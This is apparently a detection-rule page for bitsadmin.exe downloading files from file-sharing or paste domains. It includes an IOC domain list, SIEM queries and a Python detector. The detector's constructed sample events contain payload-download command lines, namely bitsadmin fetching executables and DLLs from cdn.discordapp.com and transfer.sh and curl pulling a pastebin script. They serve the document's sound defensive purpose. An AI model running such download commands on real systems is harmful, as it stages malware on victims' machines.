Suspicious Download From File-Sharing Website via Bitsadmin

    Date: 06/29/2026

    Severity: High

    Summary

    Detects bitsadmin.exe being invoked with /transfer, /create or /addfile to fetch a file from a file-sharing, paste or ephemeral-hosting domain that is commonly abused to stage payloads. BITS downloads run under a signed system binary and blend in with legitimate update traffic, so the domain in the command line is the discriminating signal.

    Indicators of Compromise (IOC) List

    Image :

    - '\bitsadmin.exe'

    OriginalFileName : 

    - 'bitsadmin.exe'

    CommandLine : 

    - ' /transfer '

    - ' /create '

    - ' /addfile '

    - '.githubusercontent.com'    

    - '0x0.st'

    - 'anonfiles.com'

    - 'bashupload.com'

    - 'cdn.discordapp.com'

    - 'chunk.io'

    - 'ddns.net'

    - 'dl.dropboxusercontent.com'

    - 'ghostbin.co'

    - 'github.com' 

    - 'glitch.me'

    - 'gofile.io'

    - 'hastebin.com'

    - 'mediafire.com'

    - 'mega.nz'

    - 'onrender.com'

    - 'pages.dev'

    - 'paste.ee'

    - 'pastebin.com'

    - 'pastebin.pl'

    - 'pastetext.net'

    - 'privatlab.com'

    - 'privatlab.net'

    - 'send.exploit.in'

    - 'sendspace.com'

    - 'storage.googleapis.com'

    - 'storjshare.io'

    - 'supabase.co'

    - 'temp.sh'

    - 'transfer.sh'

    - 'trycloudflare.com'

    - 'ufile.io'

    - 'w3spaces.com'

    - 'workers.dev'

    - 'x0.at'

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    resourcename = "Windows Security" and eventtype = "4688" and processname like "\bitsadmin.exe" and originalfilename like "bitsadmin.exe" and commandline IN ("/transfer","/create","/addfile") and commandline IN (".githubusercontent.com","0x0.st","anonfiles.com","bashupload.com","cdn.discordapp.com","chunk.io","ddns.net","dl.dropboxusercontent.com","ghostbin.co","github.com","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","x0.at")

    Detection Query 2 :

    technologygroup = "EDR" and processname like "\bitsadmin.exe" and originalfilename like "bitsadmin.exe" and commandline IN ("/transfer","/create","/addfile") and commandline IN (".githubusercontent.com","0x0.st","anonfiles.com","bashupload.com","cdn.discordapp.com","chunk.io","ddns.net","dl.dropboxusercontent.com","ghostbin.co","github.com","glitch.me","gofile.io","hastebin.com","mediafire.com","mega.nz","onrender.com","pages.dev","paste.ee","pastebin.com","pastebin.pl","pastetext.net","privatlab.com","privatlab.net","send.exploit.in","sendspace.com","storage.googleapis.com","storjshare.io","supabase.co","temp.sh","transfer.sh","trycloudflare.com","ufile.io","w3spaces.com","workers.dev","x0.at")
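    The same three selections (bitsadmin image or OriginalFileName, a download flag, a listed domain) expressed as plain Python over process-creation events, as an added example that is not Gurucul's or SigmaHQ's code. Events are dicts using the Sysmon/4688 field names from the IOC list; the sample events, job names and URLs below are constructed for illustration. The flags keep their surrounding spaces as the IOC list does, and the image check accepts either the path or the PE OriginalFileName, so a copy of bitsadmin.exe renamed to something else still matches; the example also shows that a bare /create event (no URL yet) does not fire, the later /addfile event carrying the URL does.

```python
# Added example (not Gurucul's or SigmaHQ's code): bitsadmin file-sharing
# download detection over constructed process-creation events.

# Flags that make BITS fetch a remote file. Spaces kept, as in the IOC list,
# so a path or hostname that merely contains "transfer" does not match.
BITS_DOWNLOAD_FLAGS = (" /transfer ", " /create ", " /addfile ")

# File-sharing, paste and ephemeral-hosting domains from the IOC list.
FILE_SHARING_DOMAINS = (
    ".githubusercontent.com", "0x0.st", "anonfiles.com", "bashupload.com",
    "cdn.discordapp.com", "chunk.io", "ddns.net", "dl.dropboxusercontent.com",
    "ghostbin.co", "github.com", "glitch.me", "gofile.io", "hastebin.com",
    "mediafire.com", "mega.nz", "onrender.com", "pages.dev", "paste.ee",
    "pastebin.com", "pastebin.pl", "pastetext.net", "privatlab.com",
    "privatlab.net", "send.exploit.in", "sendspace.com",
    "storage.googleapis.com", "storjshare.io", "supabase.co", "temp.sh",
    "transfer.sh", "trycloudflare.com", "ufile.io", "w3spaces.com",
    "workers.dev", "x0.at",
)


def is_bitsadmin(event: dict) -> bool:
    """Image path ends with \\bitsadmin.exe OR PE OriginalFileName is
    bitsadmin.exe. The OR matters: a copy renamed to svc.exe keeps its
    OriginalFileName in the PE version resource, so the second test fires."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\bitsadmin.exe") or original == "bitsadmin.exe"


def analyze(event: dict) -> dict:
    """Case-insensitive substring checks (the behaviour of a Sigma 'contains').
    Returns the verdict plus which flags and domains were seen, for triage."""
    cmd = event.get("CommandLine", "").lower()
    flags = [f.strip() for f in BITS_DOWNLOAD_FLAGS if f in cmd]
    domains = [d for d in FILE_SHARING_DOMAINS if d in cmd]
    return {
        "id": event.get("id"),
        "match": is_bitsadmin(event) and bool(flags) and bool(domains),
        "flags": flags,
        "domains": domains,
    }


def scan(events) -> list:
    """Ids of events satisfying all three selections."""
    return [r["id"] for r in map(analyze, events) if r["match"]]


# Constructed sample events (hypothetical hosts, job names and paths).
SAMPLE_EVENTS = [
    {   # one-shot download from a listed CDN: fires
        "id": "ev1",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"C:\Windows\System32\bitsadmin.exe /transfer dl /download "
                       r"/priority high https://cdn.discordapp.com/attachments/1/2/update.exe "
                       r"C:\Users\Public\update.exe",
    },
    {   # job creation only, no URL on this command line: does not fire
        "id": "ev2",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"C:\Windows\System32\bitsadmin.exe /create /download stage1",
    },
    {   # renamed copy adds the URL to that job: fires via OriginalFileName
        "id": "ev3",
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"C:\Users\Public\svc.exe /addfile stage1 "
                       r"https://transfer.sh/abc/payload.dll C:\Users\Public\payload.dll",
    },
    {   # download from a host not on the list: does not fire (by design)
        "id": "ev4",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"C:\Windows\System32\bitsadmin.exe /transfer upd "
                       r"https://updates.contoso.com/agent.msi C:\Temp\agent.msi",
    },
    {   # listed domain, but not bitsadmin: out of this rule's scope
        "id": "ev5",
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": r"curl.exe https://pastebin.com/raw/abcd -o C:\Temp\x.ps1",
    },
]

if __name__ == "__main__":
    for result in map(analyze, SAMPLE_EVENTS):
        print(result)
```

    ev4 is the expected false-negative shape: an attacker-controlled host that is not on the list is invisible to this rule, which is why it should sit next to a broader "bitsadmin with any URL" rule at a lower severity rather than replace it. ev5 shows the rule is bitsadmin-specific; the same domain list is worth reusing for curl, certutil and PowerShell download cradles.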

    Reference:

    https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml


    Tags

    Sigma
